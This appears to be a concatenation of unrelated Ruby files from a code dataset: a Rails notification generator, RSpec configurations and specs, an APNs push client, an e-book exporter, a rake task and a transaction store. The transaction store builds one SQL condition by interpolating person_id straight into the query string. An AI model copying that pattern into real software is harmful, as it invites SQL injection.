source_root File.expand_path('templates', __dir__)
def create_notice
copy_file "notice.rb", "app/models/notice.rb"
end
def create_user_notice
copy_file "user_notice.rb", "app/models/user_notice.rb"
end
def create_notice_controller
copy_file "notices_controller.rb", "app/controllers/notices_controller.rb"
end
def create_user_notice_controller
copy_file "user_notices_controller.rb", "app/controllers/user_notices_controller.rb"
end
def create_notice_index
copy_file "notice_index.rb", "app/views/notices/index.html.slim"
end
def create_header_partial
copy_file "header.rb", "app/views/layouts/_header.html.slim"
end
def get_current_date
@current_date = DateTime.now.strftime("%Y%m%d%H%M%S").to_i
end
def create_notice_migration
get_current_date
copy_file "notice_migration.rb", "db/migrate/#{@current_date + 1}_create_notices.rb"
end
def create_user_notices_migration
get_current_date
copy_file "user_notice_migration.rb", "db/migrate/#{@current_date + 2}_create_user_notices.rb"
end
def notice_javascript
copy_file "notification_javascript.rb", "app/javascript/packs/notification.js"
end
def add_routes
file_path = "#{Rails.root}/config"
routes_files = File.readlines("#{file_path}/routes.rb")
routes_files.each.with_index(0) do |line,index|
if index != (routes_files.count - 1)
File.open("#{file_path}/routes_copy.rb","a") do |f|
f.write(line)
end
end
end
File.open("#{file_path}/routes_copy.rb","a") do |f|
f.write("\n\tresources :notices, only: :index \n\tresources :user_notices, only: :update \nend")
end
File.delete("#{file_path}/routes.rb")
File.rename("#{file_path}/routes_copy.rb","#{file_path}/routes.rb")
end
def notifications_javascript
file_path = "#{Rails.root}/app/javascript/packs"
routes_files = File.readlines("#{file_path}/application.js")
routes_files.each do |line|
File.open("#{file_path}/application_copy.js","a") do |f|
f.write(line)
end
end
File.open("#{file_path}/application_copy.js","a") do |f|
f.write("\nrequire(\"./notification\")")
end
File.delete("#{file_path}/application.js")
File.rename("#{file_path}/application_copy.js","#{file_path}/application.js")
end
def copy_user_associations
contains_private_method = false
file_path = "#{Rails.root}/app/models"
user_file_contents = File.readlines("#{file_path}/user.rb")
user_file_contents.each.with_index(0) do |line,index|
if line.strip == "private"
contains_private_method = true
# Copy the association before the private method
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\n\thas_many :user_notices, dependent: :destroy\n\thas_many :notices, through: :user_notices\n\n")
end
end
# Continue copying the file until the last end keyword is encountered
if index != (user_file_contents.count - 1)
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write(line)
end
end
end
# Add associations if there is no private method and the copying has reached the last end keyword
if !contains_private_method
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\n\thas_many :user_notices, dependent: :destroy\n\thas_many :notices, through: :user_notices")
end
end
File.open("#{file_path}/user_copy.rb","a") do |f|
f.write("\nend")
end
File.delete("#{file_path}/user.rb")
File.rename("#{file_path}/user_copy.rb","#{file_path}/user.rb")
end
end | 31.777778 | 117 | 0.682087 |
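# Invoked from a host Rails app with (illustrative; the generator name follows
# from the class name per Rails' naming convention):
#
#   bin/rails generate notification
#
# which copies the models, controllers, views, migrations and JavaScript above,
# then patches config/routes.rb, app/javascript/packs/application.js and
# app/models/user.rb in place.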
1d0e1b320debef5ae5043b92e29ec5b6250c29b6 | 3,001 | # This file is copied to spec/ when you run 'rails generate rspec:install'
require 'spec_helper'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'
# Load support files
Dir[Rails.root.join('spec/support/**/*.rb')].each do |f|
require f
end
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => e
puts e.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
# FactoryBot
config.include FactoryBot::Syntax::Methods
# Committee
config.include CommittteeRailsHelper, type: :request
end
| 40.554054 | 86 | 0.746418 |
b9e009f8aadc395df87750926557b62a0cf990ee | 47 | module PivottableRails
VERSION = "0.1.1"
end
| 11.75 | 22 | 0.723404 |
62c9ff9b8b27cffb927557e74c0bc7bde09a37cc | 283 | class StaticPagesController < ApplicationController
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
end
end
def help
end
def about
end
def contact
end
end
| 14.15 | 67 | 0.678445 |
6a8f79745cf81b4ba5fec9482cceea4485dd5e37 | 2,201 | require 'openssl'
require 'jwt'
require 'net-http2'
module P8push
APPLE_PRODUCTION_JWT_URI = 'https://api.push.apple.com'
APPLE_DEVELOPMENT_JWT_URI = 'https://api.development.push.apple.com'
class Client
attr_accessor :jwt_uri
class << self
def development(apn_private_key, apn_team_id, apn_key_id)
client = self.new(apn_private_key, apn_team_id, apn_key_id)
client.jwt_uri = APPLE_DEVELOPMENT_JWT_URI
client
end
def production(apn_private_key, apn_team_id, apn_key_id)
client = self.new(apn_private_key, apn_team_id, apn_key_id)
client.jwt_uri = APPLE_PRODUCTION_JWT_URI
client
end
end
def initialize(apn_private_key, apn_team_id, apn_key_id)
@private_key = Base64.decode64(apn_private_key)
@team_id = apn_team_id
@key_id = apn_key_id
@timeout = Float(ENV['APN_TIMEOUT'] || 2.0)
end
def jwt_http2_post(topic, payload, token)
ec_key = OpenSSL::PKey::EC.new(@private_key)
jwt_token = JWT.encode({iss: @team_id, iat: Time.now.to_i}, ec_key, 'ES256', {kid: @key_id})
client = NetHttp2::Client.new(@jwt_uri)
h = {}
h['content-type'] = 'application/json'
h['apns-expiration'] = '0'
h['apns-priority'] = '10'
h['apns-topic'] = topic
h['authorization'] = "bearer #{jwt_token}"
res = client.call(:post, '/3/device/'+token, body: payload.to_json, timeout: @timeout,
headers: h)
client.close
return nil if res.status.to_i == 200
res.body
end
def push(*notifications)
return if notifications.empty?
notifications.flatten!
notifications.each_with_index do |notification, index|
next unless notification.kind_of?(Notification)
next if notification.sent?
next unless notification.valid?
notification.id = index
err = jwt_http2_post(notification.topic, notification.payload, notification.token)
if err.nil?
notification.mark_as_sent!
else
puts err
notification.apns_error_code = err
notification.mark_as_unsent!
end
end
end
end
end
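# Illustrative usage (placeholders throughout). The .p8 key is passed
# Base64-encoded, matching the Base64.decode64 call in the constructor, and
# each notification handed to #push must respond to #topic, #payload, #token,
# #valid?, #sent?, #id= and the mark_as_* / apns_error_code= methods used
# above (see the gem's Notification class, not shown here):
#
#   key = Base64.strict_encode64(File.read("AuthKey_ABC123DEFG.p8"))
#   client = P8push::Client.production(key, "TEAMID1234", "ABC123DEFG")
#   client.push(notification)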
| 29.346667 | 98 | 0.646524 |
335e9fc7a462e1ef67924992de6f26c3dc61c183 | 1,216 | # Copyright 2014 Red Hat, Inc, and individual contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require 'stringio'
java_import org.projectodd.wunderboss.rack.RackChannel
describe 'RackChannel' do
before(:each) do
RackChannel.create_rack_channel_class(JRuby.runtime)
@channel = WunderBoss::RackChannel.new
end
it "doesn't eat newlines when calling gets" do
@channel.io = StringIO.new("foo\nbar")
expect(@channel.gets).to eq("foo\n")
expect(@channel.gets).to eq("bar")
end
it "doesn't read entire input if asked to read more than 4096" do
@channel.io = StringIO.new("foo\nbar" * 1000)
expect(@channel.read(4097).length).to eq(4097)
end
end
| 32 | 74 | 0.737664 |
6af24c741a1a7d3bd7537b884e1b582649929ac7 | 86 | module InspecPlugins
module InputTestFixture
VERSION = '0.1.0'.freeze
end
end
| 14.333333 | 28 | 0.732558 |
ab57787b4d05b783a11eb7712dbb4a335f03e6c8 | 1,273 | require_relative 'lib/cli_gif/version'
Gem::Specification.new do |spec|
spec.name = "cli_gif"
spec.version = CliGif::VERSION
spec.authors = ["Piotr Zientara"]
spec.email = ["[email protected]"]
spec.summary = "A CLI client for Giphy"
spec.description = "Get your gifs from command line"
#spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
#spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
#spec.metadata["homepage_uri"] = spec.homepage
#spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
#spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
end
| 42.433333 | 87 | 0.653574 |
edb5dfe01239e2e85497c5c49cc0222cb91fd85f | 280 | class CreateTaggings < ActiveRecord::Migration[5.1]
def change
create_table :taggings do |t|
t.integer :todo_id, null: false
t.integer :tag_id, null: false
t.timestamps
end
add_index :taggings, :todo_id
add_index :taggings, :tag_id
end
end
| 20 | 51 | 0.671429 |
111d72042030dc6264b862ed2f320989964bf786 | 12,123 | # encoding: utf-8
require File.join(File.dirname(__FILE__), "../spec_helper.rb")
describe Her::Model::Parse do
context "when include_root_in_json is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { |env| [200, {}, { user: { id: 1, fullname: params(env)[:user][:fullname] } }.to_json] }
stub.post("/users/admins") { |env| [200, {}, { user: { id: 1, fullname: params(env)[:user][:fullname] } }.to_json] }
end
end
context "to true" do
before do
spawn_model "Foo::User" do
include_root_in_json true
parse_root_in_json true
custom_post :admins
end
end
it "wraps params in the element name in `to_params`" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(user: { fullname: "Tobias Fünke" })
end
it "wraps params in the element name in `.create`" do
@new_user = Foo::User.admins(fullname: "Tobias Fünke")
expect(@new_user.fullname).to eq("Tobias Fünke")
end
end
context "to a symbol" do
before do
spawn_model "Foo::User" do
include_root_in_json :person
parse_root_in_json :person
end
end
it "wraps params in the specified value" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(person: { fullname: "Tobias Fünke" })
end
end
context "in the parent class" do
before do
spawn_model("Foo::Model") { include_root_in_json true }
class User < Foo::Model; end
@spawned_models << :User
end
it "wraps params with the class name" do
@new_user = User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(user: { fullname: "Tobias Fünke" })
end
end
end
context "when parse_root_in_json is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
end
context "to true" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, [{ user: { id: 1, fullname: "Lindsay Fünke" } }].to_json] }
stub.get("/users/admins") { [200, {}, [{ user: { id: 1, fullname: "Lindsay Fünke" } }].to_json] }
stub.get("/users/1") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.put("/users/1") { [200, {}, { user: { id: 1, fullname: "Tobias Fünke Jr." } }.to_json] }
end
spawn_model("Foo::User") do
parse_root_in_json true
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@new_user = Foo::User.admins
expect(@new_user.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
end
context "to a symbol" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { person: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
end
spawn_model("Foo::User") { parse_root_in_json :person }
end
it "parse the data with the symbol" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
end
context "in the parent class" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
end
spawn_model("Foo::Model") { parse_root_in_json true, format: :active_model_serializers }
class User < Foo::Model
collection_path "/users"
end
@spawned_models << :User
end
it "parse the data with the symbol" do
@new_user = User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parses the collection of data" do
@users = User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
end
context "to true with format: :active_model_serializers" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/admins") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/1") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.put("/users/1") { [200, {}, { user: { id: 1, fullname: "Tobias Fünke Jr." } }.to_json] }
end
spawn_model("Foo::User") do
parse_root_in_json true, format: :active_model_serializers
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@users = Foo::User.admins
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
end
end
context "when to_params is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
builder.adapter :test do |stub|
stub.post("/users") { |env| ok! id: 1, fullname: params(env)["fullname"] }
end
end
spawn_model "Foo::User" do
def to_params
{ fullname: "Lindsay Fünke" }
end
end
end
it "changes the request parameters for one-line resource creation" do
@user = Foo::User.create(fullname: "Tobias Fünke")
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "changes the request parameters for Model.new + #save" do
@user = Foo::User.new(fullname: "Tobias Fünke")
@user.save
expect(@user.fullname).to eq("Lindsay Fünke")
end
end
context "when parse_root_in_json set json_api to true" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
builder.adapter :test do |stub|
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/admins") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/1") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.post("/users") { [200, {}, { users: [{ fullname: "Lindsay Fünke" }] }.to_json] }
stub.put("/users/1") { [200, {}, { users: [{ id: 1, fullname: "Tobias Fünke Jr." }] }.to_json] }
end
end
spawn_model("Foo::User") do
parse_root_in_json true, format: :json_api
include_root_in_json true
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@new_user = Foo::User.admins
expect(@new_user.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
it "parse the data from the JSON root element after new/save" do
@user = Foo::User.new
@user.fullname = "Lindsay Fünke (before save)"
@user.save
expect(@user.fullname).to eq("Lindsay Fünke")
end
end
context "when include_root_in_json set json_api" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { |env| [200, {}, { users: [{ id: 1, fullname: params(env)[:users][:fullname] }] }.to_json] }
end
end
context "to true" do
before do
spawn_model "Foo::User" do
include_root_in_json true
parse_root_in_json true, format: :json_api
custom_post :admins
end
end
it "wraps params in the element name in `to_params`" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(users: [{ fullname: "Tobias Fünke" }])
end
it "wraps params in the element name in `.where`" do
@new_user = Foo::User.where(fullname: "Tobias Fünke").build
expect(@new_user.fullname).to eq("Tobias Fünke")
end
end
end
context "when send_only_modified_attributes is set" do
before do
Her::API.setup url: "https://api.example.com", send_only_modified_attributes: true do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.get("/users/1") { [200, {}, { id: 1, first_name: "Gooby", last_name: "Pls" }.to_json] }
end
spawn_model "Foo::User" do
include_root_in_json true
end
end
it "only sends the attributes that were modified" do
user = Foo::User.find 1
user.first_name = "Someone"
expect(user.to_params).to eql(user: { first_name: "Someone" })
end
end
end
| 35.037572 | 124 | 0.601006 |
e917b47699289de0c62f3dbf4436b63905af9170 | 450 | require 'spec_helper'
describe CRDT::Between do
def assert_between(low, high, depth)
generated = CRDT::Between.string(low, high)
(generated > low).should be_true
(generated < high).should be_true
return if depth == 0
if rand(2) == 1
assert_between(low, generated, depth - 1)
else
assert_between(generated, high, depth - 1)
end
end
it "goes between ! and ~" do
assert_between "!", "~", 200
end
end | 23.684211 | 48 | 0.644444 |
089b987d681ae69fb071a6c5573bb0b714f05b35 | 2,047 | module Kitabu
class Exporter
def self.run(root_dir, options)
exporter = new(root_dir, options)
exporter.export!
end
attr_accessor :root_dir
attr_accessor :options
def initialize(root_dir, options)
@root_dir = root_dir
@options = options
end
def ui
@ui ||= Thor::Base.shell.new
end
def export!
helper = root_dir.join("config/helper.rb")
load(helper) if helper.exist?
FileUtils.rm_rf root_dir.join("output").to_s
export_pdf = [nil, "pdf"].include?(options[:only])
export_epub = [nil, "mobi", "epub"].include?(options[:only])
export_mobi = [nil, "mobi"].include?(options[:only])
export_txt = [nil, "txt"].include?(options[:only])
exported = []
exported << HTML.export(root_dir)
exported << PDF.export(root_dir) if export_pdf && Dependency.prince?
exported << Epub.export(root_dir) if export_epub
exported << Mobi.export(root_dir) if export_mobi && Dependency.kindlegen?
exported << Txt.export(root_dir) if export_txt && Dependency.html2text?
if exported.all?
color = :green
message = options[:auto] ? "exported!" : "** e-book has been exported"
if options[:open] && export_pdf
filepath = root_dir.join("output/#{File.basename(root_dir)}.pdf")
if RUBY_PLATFORM =~ /darwin/
IO.popen("open -a Preview.app '#{filepath}'").close
elsif RUBY_PLATFORM =~ /linux/
Process.detach(Process.spawn("xdg-open '#{filepath}'", :out => "/dev/null"))
end
end
Notifier.notify(
:image => Kitabu::ROOT.join("templates/ebook.png").to_s,
:title => "Kitabu",
:message => "Your \"#{config[:title]}\" e-book has been exported!"
)
else
color = :red
message = options[:auto] ? "could not be exported!" : "** e-book couldn't be exported"
end
ui.say message, color
end
def config
Kitabu.config(root_dir)
end
end
end
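# Illustrative invocation (path and flags are placeholders; :only, :auto and
# :open are the option keys read in #export! above):
#
#   Kitabu::Exporter.run(Pathname.new("/path/to/book"), only: "pdf", open: true)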
| 29.242857 | 94 | 0.595506 |
5d4564c10a72ddb5c8e32f3ebafab5bb62b581c0 | 1,011 | namespace :oneoff do
task :fix_user_district, [:email] => :environment do |t,args|
require 'csv'
email = args[:email]
csv_user_list_file = "#{email}/users_districs.csv"
rows_from_csv = CSV.parse(S3Wrapper.read(filename: csv_user_list_file), headers: true)
rows_from_csv.each do |row|
user_district = row.to_hash
user = User.find_by(email: user_district["Email"])
district = District.find_by(lea_id: user_district["Lea [Districts]"])
if user && district
puts "Adding User #{user.email} To #{district.name} district"
user.districts << district unless user.district_ids.include?(district.id)
if user.save
puts "Added Successfully"
else
puts "Some error came up while trying to add #{user.email} to #{district.name}: #{user.errors.full_messages}"
end
else
puts "User of district not found: #{user_district["Email"]} - #{user_district["Name [Districts]"]}"
end
end
end
end | 33.7 | 119 | 0.649852 |
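# Illustrative invocation (the email doubles as the S3 folder name; the CSV is
# expected to carry "Email", "Lea [Districts]" and "Name [Districts]" headers,
# matching the lookups above):
#
#   bundle exec rake "oneoff:fix_user_district[[email protected]]"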
bb9001fa0612dc5a7f38f28ef8ec7d680a32095f | 1,624 | # the graph
graph = {}
graph["start"] = {}
graph["start"]["a"] = 6
graph["start"]["b"] = 2
graph["a"] = {}
graph["a"]["fin"] = 1
graph["b"] = {}
graph["b"]["a"] = 3
graph["b"]["fin"] = 5
graph["fin"] = {}
# the costs table
costs = {}
costs["a"] = 6
costs["b"] = 2
costs["fin"] = Float::INFINITY
# the parents table
parents = {}
parents["a"] = "start"
parents["b"] = "start"
parents["fin"] = nil
@processed = []
def find_lowest_cost_node(costs)
lowest_cost = Float::INFINITY
lowest_cost_node = nil
# Go through each node.
costs.each do |node, cost|
# If it's the lowest cost so far and hasn't been processed yet...
if cost < lowest_cost && [email protected]?(node)
# ... set it as the new lowest-cost node.
lowest_cost = cost
lowest_cost_node = node
end
end
lowest_cost_node
end
# Find the lowest-cost node that you haven't processed yet.
node = find_lowest_cost_node(costs)
# If you've processed all the nodes, this loop is done.
until node.nil?
cost = costs[node]
# Go through all the neighbors of this node.
neighbors = graph[node]
neighbors.keys.each do |n|
new_cost = cost + neighbors[n]
# If it's cheaper to get to this neighbor by going through this node...
if costs[n] > new_cost
# ... update the cost for this node.
costs[n] = new_cost
# This node becomes the new parent for this neighbor.
parents[n] = node
end
end
# Mark the node as processed.
@processed << node
# Find the next node to process, and loop.
node = find_lowest_cost_node(costs)
end
puts "Cost from the start to each node:"
puts costs
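# Added for illustration: walk the parents table back from "fin" to recover the
# cheapest path. With the graph above, costs ends up as {"a"=>5, "b"=>2, "fin"=>6}
# and this prints start -> b -> a -> fin (total cost 6).
path = ["fin"]
path.unshift(parents[path.first]) until path.first == "start"
puts "Cheapest path: #{path.join(' -> ')} (total cost #{costs['fin']})"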
| 23.2 | 75 | 0.641626 |
39de58090f8bf79a77446d49ddc18ad04433518a | 56 | require "ci_status/cruise_control"
module CiStatus
end
| 11.2 | 34 | 0.839286 |
620c39fbf1f77c0fd4567b4c266682be03d41178 | 387 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
$LOAD_PATH.unshift(File.dirname(__FILE__))
require 'rspec'
require 'rspec/matchers'
require 'cron2english'
# Requires supporting files with custom matchers and macros, etc.,
# in ./support/ and its subdirectories.
Dir["#{File.dirname(__FILE__)}/support/**/*.rb"].each {|f| require f}
RSpec.configure do |config|
end
| 25.8 | 69 | 0.731266 |
38ee04ec0014b827cc2bdefaa434f0d51fb15d39 | 4,336 | module TransactionService::Store::Transaction
TransactionModel = ::Transaction
module_function
# booking validation happens before SQL BEGIN-COMMIT block
def create(tx_data)
tx_model = TransactionModel.new(tx_data.except(:content, :video, :booking_fields, :starting_page))
build_conversation(tx_model, tx_data)
build_booking(tx_model, tx_data)
tx_model.save
tx_model
end
def add_message(community_id:, transaction_id:, sender_id:, message:, counter_offer: nil)
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
if tx_model
tx_model.conversation.messages.create({content: message, sender_id: sender_id, counter_offer: counter_offer})
do_mark_as_unseen_by_other(tx_model, sender_id)
end
nil
end
# Mark transaction as unseen, i.e. something new (e.g. transition) has happened
#
# Under the hood, this is stored to conversation, which is not optimal since that ties transaction and
# conversation tightly together.
def mark_as_unseen_by_other(community_id:, transaction_id:, person_id:)
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
do_mark_as_unseen_by_other(tx_model, person_id) if tx_model
nil
end
def get(transaction_id)
TransactionModel.where(id: transaction_id, deleted: false).first
end
def get_in_community(community_id:, transaction_id:)
TransactionModel.where(id: transaction_id, community_id: community_id, deleted: false).first
end
def upsert_shipping_address(community_id:, transaction_id:, addr:)
tx_model = TransactionModel.where(id: transaction_id, community_id: community_id).first
if tx_model
address = tx_model.shipping_address || tx_model.build_shipping_address
if addr.is_a?(ActionController::Parameters)
addr = addr.permit(:name, :street1, :street2, :postal_code, :city, :country, :state_or_province)
end
address.update!(addr)
end
end
def delete(community_id:, transaction_id:)
tx_model = TransactionModel.where(id: transaction_id, community_id: community_id).first
if tx_model
tx_model.update_attribute(:deleted, true)
tx_model
end
end
def update_booking_uuid(community_id:, transaction_id:, booking_uuid:)
unless booking_uuid.is_a?(UUIDTools::UUID)
raise ArgumentError.new("booking_uuid must be a UUID, was: #{booking_uuid} (#{booking_uuid.class.name})")
end
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
if tx_model
tx_model.update(booking_uuid: UUIDUtils.raw(booking_uuid))
tx_model
end
end
def build_conversation(tx_model, tx_data)
conversation = tx_model.build_conversation(
tx_data.slice(:community_id, :listing_id, :starting_page))
conversation.participations.build(
person_id: tx_data[:listing_author_id],
is_starter: false,
is_read: false)
conversation.participations.build(
person_id: tx_data[:starter_id],
is_starter: true,
is_read: true)
if tx_data[:content].present?
conversation.messages.build({
content: tx_data[:content],
video: tx_data[:video],
sender_id: tx_data[:starter_id]})
end
end
def build_booking(tx_model, tx_data)
if is_booking?(tx_data)
if tx_data[:booking_fields][:per_hour]
start_time, end_time, per_hour = tx_data[:booking_fields].values_at(:start_time, :end_time, :per_hour)
tx_model.build_booking(
start_time: start_time,
end_time: end_time,
per_hour: per_hour)
else
start_on, end_on = tx_data[:booking_fields].values_at(:start_on, :end_on)
tx_model.build_booking(
start_on: start_on,
end_on: end_on)
end
tx_model.booking.tx = tx_model
end
end
def is_booking?(tx_data)
tx_data[:booking_fields] && ((tx_data[:booking_fields][:start_on] && tx_data[:booking_fields][:end_on]) ||
(tx_data[:booking_fields][:start_time] && tx_data[:booking_fields][:end_time]))
end
def do_mark_as_unseen_by_other(tx_model, person_id)
tx_model
.conversation
.participations
.where("person_id != '#{person_id}'")
.update_all(is_read: false)
end
end
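# Illustrative call (ids and field values are placeholders). The keys shown are
# the ones consumed above: booking_fields drives build_booking, while content,
# video and starting_page feed the conversation; everything else goes to the
# Transaction model itself.
#
#   TransactionService::Store::Transaction.create(
#     community_id: 1,
#     listing_id: 2,
#     starter_id: "buyer-uuid",
#     listing_author_id: "seller-uuid",
#     content: "Is this still available?",
#     booking_fields: { start_on: Date.today, end_on: Date.today + 2 }
#   )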
| 32.601504 | 115 | 0.712177 |
5d1de41c902c7756f5f90e6fd8504f7998a3698c | 815 | require 'rails_helper'
module Utilities
RSpec.describe MatterTypeFinder do
describe '.call' do
subject { described_class.call(code) }
context 'successful lookup' do
before { subject }
context 'passed as a symbol' do
let(:code) { :DA002 }
it 'returns domestic abuse' do
expect(subject).to eq 'domestic_abuse'
end
end
context 'passed as a string' do
let(:code) { 'SE013' }
it 'returns section8' do
expect(subject).to eq 'section8'
end
